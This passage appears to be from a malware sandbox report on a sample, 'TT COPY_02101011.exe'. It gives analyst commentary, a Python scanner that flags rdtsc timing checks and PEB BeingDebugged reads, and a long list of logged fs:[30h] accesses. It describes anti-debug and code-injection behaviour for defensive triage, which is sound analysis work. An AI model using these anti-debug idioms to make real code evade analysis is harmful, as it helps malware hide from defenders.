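The RDTSC interceptor entries above record a specific six-byte sequence, `rdtsc; xor ecx, ecx; add ecx, eax; rdtsc`, at 0x408614 in the sample and at the same offset relative to the module base (0x768614) in the injected NETSTAT.EXE, which is one more confirmation that the same payload image was written into both. The long run of `mov eax, dword ptr fs:[00000030h]` entries that the report lists next are reads of the 32-bit PEB pointer; note that those addresses (00A9xxxx to 00B6xxxx) fall inside the region where the report found the wntdll.pdb string, so most of them are ntdll's own PEB accesses inside the privately mapped copy rather than bespoke anti-debug code, and the interesting indicator is the copy itself. The scanner below is an added example, not part of the Joe Sandbox report: it finds rdtsc pairs separated by a short gap (the timing-delta idiom) and fs:[30h] reads that are followed within a few bytes by an access to PEB offset +2 (BeingDebugged), the distinction that separates a real anti-debug check from a generic PEB read. The byte buffer is constructed; the opcode patterns are standard x86 encodings, the 16-byte windows are my assumption, and a byte scanner of this kind is a triage aid, not a disassembler (an `0F 31` pair inside data or immediate operands will also match).

```python
# Constructed x86-32 byte buffer (not extracted from the sample): the reported
# "rdtsc; xor ecx,ecx; add ecx,eax; rdtsc" sequence, a BeingDebugged check, and
# a plain PEB.Ldr read that should NOT count as an anti-debug check.
SAMPLE = (
    b"\x55\x8b\xec"                          # push ebp; mov ebp, esp
    + b"\x0f\x31\x31\xc9\x01\xc1\x0f\x31"    # rdtsc; xor ecx,ecx; add ecx,eax; rdtsc
    + b"\x2b\xc1"                            # sub eax, ecx          (timing delta)
    + b"\x3d\x00\x10\x00\x00"                # cmp eax, 1000h        (threshold)
    + b"\x64\xa1\x30\x00\x00\x00"            # mov eax, fs:[30h]     (PEB)
    + b"\x0f\xb6\x40\x02"                    # movzx eax, byte ptr [eax+2]  (BeingDebugged)
    + b"\x85\xc0"                            # test eax, eax
    + b"\x64\x8b\x0d\x30\x00\x00\x00"        # mov ecx, fs:[30h]     (PEB)
    + b"\x8b\x41\x0c"                        # mov eax, [ecx+0Ch]    (PEB.Ldr, API lookup)
    + b"\xc3"                                # ret
)
BASE = 0x408611  # chosen so the first rdtsc lands at 0x408614, the report's first hit

RDTSC = b"\x0f\x31"

# Encodings of the 32-bit PEB read the report lists (fs:[30h]); x64 code uses gs:[60h] instead.
PEB_READS = {
    b"\x64\xa1\x30\x00\x00\x00":     "mov eax, fs:[30h]",
    b"\x64\x8b\x05\x30\x00\x00\x00": "mov eax, fs:[30h]",
    b"\x64\x8b\x0d\x30\x00\x00\x00": "mov ecx, fs:[30h]",
}
# Follow-up accesses to PEB+2 (BeingDebugged) via eax or ecx.
BEING_DEBUGGED = (
    b"\x0f\xb6\x40\x02",   # movzx eax, byte ptr [eax+2]
    b"\x8a\x40\x02",       # mov al, [eax+2]
    b"\x80\x78\x02\x00",   # cmp byte ptr [eax+2], 0
    b"\x0f\xb6\x41\x02",   # movzx eax, byte ptr [ecx+2]
    b"\x80\x79\x02\x00",   # cmp byte ptr [ecx+2], 0
)


def find_rdtsc_pairs(code, base, max_gap=16):
    """(addr1, addr2) for consecutive rdtsc instructions at most max_gap bytes apart."""
    offsets = [i for i in range(len(code) - 1) if code[i:i + 2] == RDTSC]
    return [(base + a, base + b) for a, b in zip(offsets, offsets[1:]) if b - a <= max_gap]


def find_peb_reads(code, base, window=16):
    """(addr, mnemonic, checks_being_debugged) for every fs:[30h] read, sorted by address."""
    hits = []
    for pattern, text in PEB_READS.items():
        start = 0
        while (i := code.find(pattern, start)) != -1:
            after = code[i + len(pattern): i + len(pattern) + window]
            hits.append((base + i, text, any(sig in after for sig in BEING_DEBUGGED)))
            start = i + 1
    return sorted(hits)


if __name__ == "__main__":
    for a, b in find_rdtsc_pairs(SAMPLE, BASE):
        print(f"rdtsc pair: {a:#010x} -> {b:#010x} (gap {b - a} bytes)")
    for addr, text, dbg in find_peb_reads(SAMPLE, BASE):
        print(f"{addr:#010x} {text}{'  [BeingDebugged check]' if dbg else ''}")
```

Applied to a dumped RWX region such as the one at 00A70000 in this report, the rdtsc scanner should find nothing (the timing check lives in the payload at 0x4088E0 and 0x408614, not in ntdll), while the PEB scanner will fire on many addresses, only a handful of which carry the +2 follow-up; that split is what tells an analyst which hits are worth opening in a disassembler.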
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AD90AF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AC20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AC20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AC20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AC20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AC20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AC20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00ACF0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00ACF0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00ACF0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00A99080 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00B13884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00B13884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00A958EC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00B2B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00B2B8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00B2B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00B2B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00B2B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00B2B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AAB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AAB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AAB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AAB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AC002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AC002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AC002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AC002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AC002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00B64015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00B64015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00B17016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00B17016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00B17016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00B61074 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00B52073 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AB0050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AB0050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AC61A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AC61A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00B151BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00B151BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00B151BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00B151BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00B169A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00ACA185 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00ABC182 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AC2990 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00A9B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00A9B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00A9B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00B241E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AB4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AB4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AB4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AB4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AB4120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AC513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AC513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00A99100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00A99100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00A99100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00A9C962 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00A9B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00A9B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00ABB944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00ABB944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00A952A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00A952A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00A952A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00A952A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00A952A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AAAAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AAAAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00ACFAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00ACD294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00ACD294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AC2AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AC2ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AD4A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AD4A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AA8A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00B5AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00B5AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AB3A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00A95210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00A95210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00A95210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00A95210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00A9AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00A9AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00B4B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00B4B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00B68A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AD927A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00B5EA55 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00B24257 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00A99240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00A99240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00A99240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00A99240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AC4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AC4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AC4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00B65BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AA1B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AA1B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00B4D380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AC2397 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00ACB390 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00B5138A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00ABDBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AC03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AC03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AC03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AC03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AC03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AC03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00B153CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00B153CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00B5131B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00A9DB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AC3B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AC3B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00A9DB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00B68B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00A9F358 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00AA849B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00B16CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00B16CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00B16CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00B514FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B68CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00ACBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B6740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B6740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B6740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B16C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B16C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B16C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B16C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AB746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B2C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B2C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00ACA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B605AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B605AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A92D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A92D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A92D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A92D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A92D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00ACFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00ACFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B48DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AAD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AAD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B5FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B5FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B5FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B5FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B16DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B16DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B16DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B16DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B16DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B16DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B68D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B1A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B5E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A9AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
